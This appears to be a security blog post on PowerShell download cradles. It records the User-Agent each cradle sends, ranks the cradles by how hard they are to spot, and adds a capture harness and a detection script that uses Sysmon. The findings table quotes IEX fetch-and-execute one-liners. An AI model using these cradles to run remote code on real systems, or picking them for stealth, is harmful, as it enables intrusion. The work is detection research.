Taking a Closer Look at PowerShell Download Cradles
A Twitter discussion came up about PowerShell download cradles and the User Agents they send on the wire. I decided to investigate by running the cradles myself and observing the resulting HTTP requests with an intrusion detection system.
Methodology
I took the list of download cradles from HarmJ0y's GitHub repository and tested each method against a benign PowerShell script hosted on a local web server. The SELKS IDS distribution (Suricata with an ELK stack) captured the traffic, and the User Agent each technique sent was read from the IDS's HTTP records.
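Reproducing this measurement does not actually need an IDS. The harness below is an added example (it is not code from the original post or from HarmJ0y's list): it serves a tiny file from a System.Net.HttpListener inside the same PowerShell session, runs each cradle from the findings table in a background job, and records the User-Agent header of every request that arrives. It assumes Windows PowerShell 5.1, that TCP port 8080 on localhost is free, and that the listener prefix is usable from your account (run elevated, or reserve it with netsh http add urlacl, if Start() reports access denied). The cradles are run without IEX because only the request matters here, not execution of the downloaded content.

```powershell
# Added example (not from the original post or HarmJ0y's list): capture the User-Agent
# each download cradle sends, without an IDS, by serving the file from an HttpListener in
# this session while each cradle runs in a background job.
# Assumptions: Windows PowerShell 5.1; TCP 8080 is free; if $listener.Start() throws
# "Access is denied", run elevated or: netsh http add urlacl url=http://localhost:8080/ user=<you>

$Prefix = 'http://localhost:8080/'
$Url    = $Prefix + 'hey.xml'   # a tiny XML body is served so XmlDocument.Load also succeeds

# The cradles from the findings table, minus IEX; the Internet Explorer COM method is omitted.
$Cradles = [ordered]@{
    'Net.WebClient.DownloadString' = { param($u) (New-Object Net.WebClient).DownloadString($u) }
    'Invoke-WebRequest (iwr)'      = { param($u) Invoke-WebRequest -Uri $u -UseBasicParsing }
    'Msxml2.XMLHTTP'               = { param($u)
        $h = New-Object -ComObject Msxml2.XMLHTTP
        $h.open('GET', $u, $false); $h.send(); $h.responseText }
    'WinHttp.WinHttpRequest.5.1'   = { param($u)
        $h = New-Object -ComObject WinHttp.WinHttpRequest.5.1
        $h.Open('GET', $u, $false); $h.Send(); $h.ResponseText }
    'BITS (Start-BitsTransfer)'    = { param($u)
        Import-Module BitsTransfer
        Start-BitsTransfer -Source $u -Destination (Join-Path $env:TEMP 'cradle-probe.xml') }
    'System.Xml.XmlDocument.Load'  = { param($u) (New-Object System.Xml.XmlDocument).Load($u) }
}

function Get-CradleUserAgent {
    param([string]$Name, [scriptblock]$Cradle)

    $listener = New-Object System.Net.HttpListener
    $listener.Prefixes.Add($Prefix)
    $listener.Start()
    $body     = [System.Text.Encoding]::UTF8.GetBytes('<benign/>')
    $requests = New-Object System.Collections.Generic.List[string]

    # The cradle blocks until it receives a response, so it must run in another process
    # (a PowerShell job) while this session answers the request.
    $job      = Start-Job -ScriptBlock $Cradle -ArgumentList $Url
    $deadline = (Get-Date).AddSeconds(30)
    $pending  = $null
    try {
        while ($job.State -in @('NotStarted', 'Running') -and (Get-Date) -lt $deadline) {
            if (-not $pending) { $pending = $listener.GetContextAsync() }
            if (-not $pending.Wait(250)) { continue }      # poll so the job state is re-checked
            $ctx = $pending.Result; $pending = $null
            $ua  = $ctx.Request.UserAgent
            $uaText = if ($ua) { $ua } else { '<no User-Agent header>' }
            $requests.Add("$($ctx.Request.HttpMethod) $uaText")
            $ctx.Response.ContentType     = 'text/xml'
            $ctx.Response.ContentLength64 = $body.Length
            if ($ctx.Request.HttpMethod -ne 'HEAD') {      # BITS may probe with HEAD before GET
                $ctx.Response.OutputStream.Write($body, 0, $body.Length)
            }
            $ctx.Response.Close()
        }
    } finally {
        $null  = Wait-Job $job -Timeout 5
        $state = $job.State
        Stop-Job $job; Remove-Job $job -Force
        $listener.Stop(); $listener.Close()
    }
    [pscustomobject]@{ Method = $Name; JobState = $state; Requests = ($requests -join ' | ') }
}

$results = foreach ($entry in $Cradles.GetEnumerator()) {
    Get-CradleUserAgent -Name $entry.Key -Cradle $entry.Value
}
$results | Format-Table -AutoSize -Wrap
```

Run it from an interactive Windows PowerShell 5.1 session; the output is one row per cradle with the job state and every request the listener saw (the BITS row may show a HEAD followed by a GET). Values will differ from the table wherever the PowerShell or Windows build differs, since Invoke-WebRequest embeds the engine version in its User Agent.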
Findings
| Command | User-Agent |
|---|---|
| IEX (New-Object Net.Webclient).downloadstring("http://192.168.1.116/hey.ps1") | No User-Agent header |
| IEX (iwr 'http://192.168.1.116/hey.ps1') | Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.15063.483 |
| Internet Explorer COM object method | N/A – couldn't get this one to work |
| Msxml2.XMLHTTP method | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E) |
| WinHttp.WinHttpRequest.5.1 method | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) |
| BITS transfer method | Microsoft BITS/7.8 |
| XML document loading method | No User-Agent header |
Key Observations
From a stealth point of view, at least as far as User Agents go, the first and last methods in the chart (Net.WebClient.DownloadString and XML document loading) stand out as the least identifiable, since they send no User-Agent header at all. The Msxml2.XMLHTTP method is also hard to single out, because its User Agent is an Internet Explorer compatibility string rather than anything PowerShell-specific. Note that a request with no User-Agent header is itself unusual for a workstation and can be alerted on, so "no User Agent" is not the same as "no signal".
Testing was conducted on Windows 10 with PowerShell version 5.1.15063.483 and latest updates.
Conclusion
Detection should not rely on User Agent analysis alone. Several of the methods do produce distinctive User Agents at the network level (WindowsPowerShell/5.1.15063.483, WinHttp.WinHttpRequest.5, Microsoft BITS/7.8), and those are worth alerting on, but two methods send no User-Agent header at all and the Msxml2.XMLHTTP method hides behind an Internet Explorer string. Pair the network view with host telemetry: PowerShell Script Block and Module logging record the cradle itself, and Sysmon network connection events (Event ID 3) attribute the outbound HTTP connection to powershell.exe regardless of which User Agent it sent.
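To make that concrete, the following is an added example (not code from the original post): it turns the findings table into User-Agent detection logic, runs it over IDS HTTP records, and then joins each record to the process that opened the connection, which is where the methods the User-Agent cannot identify get caught. Field names follow Suricata eve.json "http" events and Sysmon Event ID 3 (NetworkConnect); the records at the bottom are constructed for this example, and the 192.168.1.50 client and the Chrome request are made up.

```powershell
# Added example (not from the original post): apply the findings table as User-Agent
# detection logic to IDS records, then join each record to the process that opened the
# connection. Field names follow Suricata eve.json "http" events and Sysmon Event ID 3;
# the records at the bottom are constructed for this example.

# Signatures from the findings table. Deliberately absent: Msxml2.XMLHTTP, whose agent is
# an Internet Explorer string, and the two methods that send no header at all.
$CradleAgentPatterns = @(
    @{ Label = 'Invoke-WebRequest';          Pattern = '^Mozilla/5\.0 \(Windows NT.*\) WindowsPowerShell/' }
    @{ Label = 'WinHttp.WinHttpRequest.5.1'; Pattern = '^Mozilla/4\.0 \(compatible; Win32; WinHttp\.WinHttpRequest\.5\)$' }
    @{ Label = 'BITS';                       Pattern = '^Microsoft BITS/' }
)

function Get-UserAgentVerdict {
    param([string]$UserAgent)
    # Suricata omits http_user_agent entirely when the header is absent, so $null lands here.
    if ([string]::IsNullOrEmpty($UserAgent)) { return 'missing User-Agent (WebClient/XmlDocument style)' }
    foreach ($p in $CradleAgentPatterns) { if ($UserAgent -match $p.Pattern) { return $p.Label } }
    return 'unremarkable'
}

function Find-PowerShellDownloads {
    param([string[]]$EveJsonLines, [object[]]$SysmonNetworkConnects)
    $httpEvents = $EveJsonLines | ForEach-Object { $_ | ConvertFrom-Json } |
        Where-Object { $_.event_type -eq 'http' }
    foreach ($e in $httpEvents) {
        # Join on the connection 4-tuple; Sysmon EID 3 names the image that owned the socket.
        $conn = $SysmonNetworkConnects | Where-Object {
            $_.SourceIp -eq $e.src_ip -and [int]$_.SourcePort -eq $e.src_port -and
            $_.DestinationIp -eq $e.dest_ip -and [int]$_.DestinationPort -eq $e.dest_port
        } | Select-Object -First 1
        $verdict = Get-UserAgentVerdict $e.http.http_user_agent
        $image   = if ($conn) { Split-Path $conn.Image -Leaf } else { $null }
        [pscustomobject]@{
            Url       = $e.http.hostname + $e.http.url
            UserAgent = $e.http.http_user_agent
            UAVerdict = $verdict
            Image     = $image
            Flagged   = ($verdict -ne 'unremarkable') -or ($image -eq 'powershell.exe')
        }
    }
}

# Constructed sample data: three cradles and one ordinary browser request from the same host.
$eve = @(
    '{"event_type":"http","src_ip":"192.168.1.50","src_port":49201,"dest_ip":"192.168.1.116","dest_port":80,"http":{"hostname":"192.168.1.116","url":"/hey.ps1","http_method":"GET"}}'
    '{"event_type":"http","src_ip":"192.168.1.50","src_port":49202,"dest_ip":"192.168.1.116","dest_port":80,"http":{"hostname":"192.168.1.116","url":"/hey.ps1","http_method":"GET","http_user_agent":"Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.15063.483"}}'
    '{"event_type":"http","src_ip":"192.168.1.50","src_port":49203,"dest_ip":"192.168.1.116","dest_port":80,"http":{"hostname":"192.168.1.116","url":"/hey.ps1","http_method":"GET","http_user_agent":"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E)"}}'
    '{"event_type":"http","src_ip":"192.168.1.50","src_port":49204,"dest_ip":"192.168.1.116","dest_port":80,"http":{"hostname":"192.168.1.116","url":"/index.html","http_method":"GET","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"}}'
)
$ps = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
$sysmon = @(
    [pscustomobject]@{ Image = $ps; SourceIp = '192.168.1.50'; SourcePort = '49201'; DestinationIp = '192.168.1.116'; DestinationPort = '80' }
    [pscustomobject]@{ Image = $ps; SourceIp = '192.168.1.50'; SourcePort = '49202'; DestinationIp = '192.168.1.116'; DestinationPort = '80' }
    [pscustomobject]@{ Image = $ps; SourceIp = '192.168.1.50'; SourcePort = '49203'; DestinationIp = '192.168.1.116'; DestinationPort = '80' }
    [pscustomobject]@{ Image = 'C:\Program Files\Google\Chrome\Application\chrome.exe'; SourceIp = '192.168.1.50'; SourcePort = '49204'; DestinationIp = '192.168.1.116'; DestinationPort = '80' }
)
Find-PowerShellDownloads -EveJsonLines $eve -SysmonNetworkConnects $sysmon | Format-Table -AutoSize -Wrap
```

The first two records are flagged by the User Agent alone (one is missing, one carries WindowsPowerShell/5.1.15063.483). The third carries the Internet Explorer string from the Msxml2.XMLHTTP row and is flagged only because Sysmon ties the socket to powershell.exe; the Chrome request is left alone. Drop the Sysmon join and the third record disappears from the results, which is the gap the conclusion is about.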